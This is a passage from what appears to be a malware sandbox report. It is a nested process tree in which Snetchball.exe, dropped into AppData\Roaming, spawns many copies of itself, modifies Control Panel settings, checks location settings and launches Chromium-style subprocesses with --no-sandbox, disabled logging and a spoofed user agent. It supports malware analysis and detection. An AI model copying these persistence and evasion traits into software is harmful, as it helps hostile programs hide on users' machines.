                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                        • Modifies Control Panel
                                                                                                                                                                                                        PID:3004
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:5448
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:888
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                              PID:5564
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                PID:4436
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                  PID:5952
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Modifies Control Panel
                                                                                                                                                                                                                  PID:4092
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                    PID:6360
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                    • Modifies Control Panel
                                                                                                                                                                                                                    PID:6660
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                      PID:5652
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                        PID:7716
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Modifies Control Panel
                                                                                                                                                                                                                      PID:2852
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:564
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:2668
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:668
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:5148
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Modifies Control Panel
                                                                                                                                                                                                                          PID:4784
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Modifies Control Panel
                                                                                                                                                                                                                          PID:5280
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                            • Modifies Control Panel
                                                                                                                                                                                                                            PID:6576
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                              PID:6964
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                PID:5744
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:5392
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                              • Modifies Control Panel
                                                                                                                                                                                                                              PID:5532
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                PID:5700
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                • Modifies Control Panel
                                                                                                                                                                                                                                PID:5928
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                    PID:7732
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                    PID:6108
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                      PID:5200
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                        PID:1616
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                          PID:5908
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                            PID:6020
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                              PID:5420
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                PID:4156
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                  PID:5092
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                  • Modifies Control Panel
                                                                                                                                                                                                                                                  PID:6352
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                    PID:6692
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                      PID:7052
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                        PID:4356
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Modifies Control Panel
                                                                                                                                                                                                                                                      PID:456
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                          PID:5400
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                              PID:7332
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                              PID:5548
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                PID:5728
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                • Modifies Control Panel
                                                                                                                                                                                                                                                                PID:5988
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                  PID:4244
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                                  • Modifies Control Panel
                                                                                                                                                                                                                                                                  PID:6140
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                    PID:5640
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                    • Modifies Control Panel
                                                                                                                                                                                                                                                                    PID:2644
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                      PID:5772
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                      • Modifies Control Panel
                                                                                                                                                                                                                                                                      PID:3032
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                      • Modifies Control Panel
                                                                                                                                                                                                                                                                      PID:3152
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                                                      • Modifies Control Panel
                                                                                                                                                                                                                                                                      PID:6680
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=3068,94041943469709422,663108720176713192,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 11.1; Mobile; rv:109.0) Gecko/115.0 Firefox/115.0" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3100 /prefetch:2
                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                        PID:7848
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=3068,94041943469709422,663108720176713192,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 11.1; Mobile; rv:109.0) Gecko/115.0 Firefox/115.0" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3356 /prefetch:8
                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                          PID:7256
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=3068,94041943469709422,663108720176713192,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 11.1; Mobile; rv:109.0) Gecko/115.0 Firefox/115.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                                                          PID:7832
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                            • Modifies Control Panel
                                                                                                                                                                                                                                                                            PID:224
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                                              • Modifies Control Panel
                                                                                                                                                                                                                                                                              PID:7464
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=3016,16893688687687847803,14777266703321395089,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 11.1; Mobile; rv:109.0) Gecko/115.0 Firefox/115.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                  PID:4384
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=3016,16893688687687847803,14777266703321395089,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 11.1; Mobile; rv:109.0) Gecko/115.0 Firefox/115.0" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3292 /prefetch:8
                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                    PID:784
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=3016,16893688687687847803,14777266703321395089,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 11.1; Mobile; rv:109.0) Gecko/115.0 Firefox/115.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                                    PID:7004
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=3016,16893688687687847803,14777266703321395089,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 11.1; Mobile; rv:109.0) Gecko/115.0 Firefox/115.0" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3044 /prefetch:2
                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                      PID:7028
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=3016,16893688687687847803,14777266703321395089,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --disable-gpu-compositing --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 11.1; Mobile; rv:109.0) Gecko/115.0 Firefox/115.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1
                                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                                                                      PID:4972
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 4784
                                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                      PID:184
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                      PID:752
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                        PID:6816
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                          PID:5712
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                                            PID:6272
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                              PID:4888
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                              PID:3276
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                PID:7200
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                                  PID:3228
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                    PID:6616
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                                      PID:7520
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=3068,94041943469709422,663108720176713192,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 11.1; Mobile; rv:109.0) Gecko/115.0 Firefox/115.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                                                    PID:7876
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
